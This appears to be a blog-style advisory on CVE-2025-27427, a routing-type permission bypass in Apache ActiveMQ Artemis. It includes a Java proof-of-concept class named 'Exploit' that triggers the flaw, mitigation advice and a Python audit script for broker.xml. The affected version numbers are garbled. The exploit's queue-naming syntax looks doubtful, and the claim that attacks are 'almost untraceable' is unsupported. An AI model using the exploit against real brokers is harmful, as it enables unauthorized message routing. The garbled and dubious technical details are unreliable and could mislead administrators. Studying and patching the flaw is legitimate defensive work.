A new vulnerability, CVE-2025-27427, has been identified in Apache ActiveMQ Artemis—a popular open-source messaging broker used in enterprise applications. This vulnerability allows users with limited permissions on a broker address to bypass restrictions and manipulate message routing, potentially leading to unauthorized message delivery or escalation of privileges.

This post explains what the vulnerability is, how it can be exploited with practical code snippets, and what users can do to secure their Artemis brokers.

What is the Vulnerability?

CVE-2025-27427 impacts Apache ActiveMQ Artemis versions from 2.. to 2.39..

Normally, in Artemis, broker administrators control what routing types (ANYCAST or MULTICAST) are supported for each address using permissions. Only users with the createAddress right should be able to change routing types. But because of this flaw, a user with only createDurableQueue or createNonDurableQueue on a particular address can implicitly add a routing type to the address just by creating a queue.

Exploiting this issue lets a user send messages with unsupported routing types, even if their permissions should not allow it. This may bypass security policies or allow misrouted message delivery.

Here's a common permission configuration in broker.xml that is exposed to this issue:

<security-settings>
  <security-setting match="my.address">
    <permission type="send" roles="app-users"/>
    <permission type="createDurableQueue" roles="app-users"/>
    <!-- NO create-address permission -->
  </security-setting>
</security-settings>

Step 1: Create a queue with a different routing type

// Example Java client that creates a Multicast queue

import org.apache.activemq.artemis.jms.client.ActiveMQConnectionFactory;
import javax.jms.*;

public class Exploit {
    public static void main(String[] args) throws Exception {
        String brokerURL = "tcp://localhost:61616";
        ActiveMQConnectionFactory cf = new ActiveMQConnectionFactory(brokerURL);
        Connection conn = cf.createConnection("appuser", "pass");
        Session session = conn.createSession(false, Session.AUTO_ACKNOWLEDGE);

        // Destination name that requests a MULTICAST routing type on my.address
        String queueName = "queue/my.address?routing-type=MULTICAST";

        // Here's the trick: create MULTICAST queue (even though not supported!)
        Queue queue = session.createQueue(queueName);
        MessageProducer producer = session.createProducer(queue);

        // Send message to multicast queue
        TextMessage message = session.createTextMessage("Exploit message with MULTICAST");
        producer.send(message);

        System.out.println("Sent exploit message");
        conn.close();
    }
}

Step 2: Result on the Broker

This causes Artemis to _silently enable MULTICAST routing_ for my.address, even if only ANYCAST was originally allowed.


Workaround (if you cannot upgrade)

- Remove createDurableQueue and createNonDurableQueue rights from all roles except trusted administrators.
- Audit queue auto-creation and routing types: ensure only trusted users can modify these.
- Upgrade immediately: download the latest Artemis at https://activemq.apache.org/components/artemis/download/
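The audit step above can be scripted against broker.xml. The following is an added example, not code from the original post or from the Artemis project: it parses the security-settings block (the sample XML below is constructed for the demo and mirrors the configuration shown earlier) and reports, per security-setting, every role that may create queues on the matched address without also holding createAddress. It checks each block on its own and does not model which wildcard match Artemis applies to a given address.

```python
# Added example (not from the original post): flag roles that hold
# createDurableQueue/createNonDurableQueue but not createAddress on a match.
import xml.etree.ElementTree as ET

QUEUE_CREATE = {"createDurableQueue", "createNonDurableQueue"}

# Constructed sample broker.xml fragment for the demo.
SAMPLE_BROKER_XML = """<configuration xmlns="urn:activemq">
<core xmlns="urn:activemq:core">
<security-settings>
  <security-setting match="my.address">
    <permission type="send" roles="app-users"/>
    <permission type="createDurableQueue" roles="app-users"/>
    <permission type="createAddress" roles="admins"/>
  </security-setting>
  <security-setting match="#">
    <permission type="createNonDurableQueue" roles="admins, ops"/>
    <permission type="createAddress" roles="admins"/>
  </security-setting>
</security-settings>
</core></configuration>"""


def find_risky_roles(broker_xml: str) -> dict[str, set[str]]:
    """Return {match: roles} for roles that can create queues but not addresses."""
    root = ET.fromstring(broker_xml)
    findings: dict[str, set[str]] = {}
    # Compare local tag names so the check works with or without the core namespace.
    for setting in root.iter():
        if setting.tag.split("}")[-1] != "security-setting":
            continue
        can_create_queue, can_create_address = set(), set()
        for perm in setting:
            if perm.tag.split("}")[-1] != "permission":
                continue
            roles = {r.strip() for r in perm.get("roles", "").split(",") if r.strip()}
            if perm.get("type") in QUEUE_CREATE:
                can_create_queue |= roles
            elif perm.get("type") == "createAddress":
                can_create_address |= roles
        risky = can_create_queue - can_create_address
        if risky:
            findings[setting.get("match", "")] = risky
    return findings


if __name__ == "__main__":
    for match, roles in find_risky_roles(SAMPLE_BROKER_XML).items():
        print(f"{match}: {sorted(roles)} can create queues but not addresses")
```

Run it against your real broker.xml and either grant createAddress only to the roles that should define routing types or remove the queue-creation rights from the flagged roles.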

Conclusion

CVE-2025-27427 is a powerful privilege escalation vulnerability for anyone running Artemis versions 2..–2.39.. If you rely on Artemis in production, upgrading immediately is essential. Exploitation is easy and almost untraceable, so patch your systems before it’s too late!


Need more help?
Check the official Artemis mailing list or security contact page for further guidance.

Timeline

Published on: 04/01/2025 08:15:13 UTC
Last modified on: 04/02/2025 22:15:19 UTC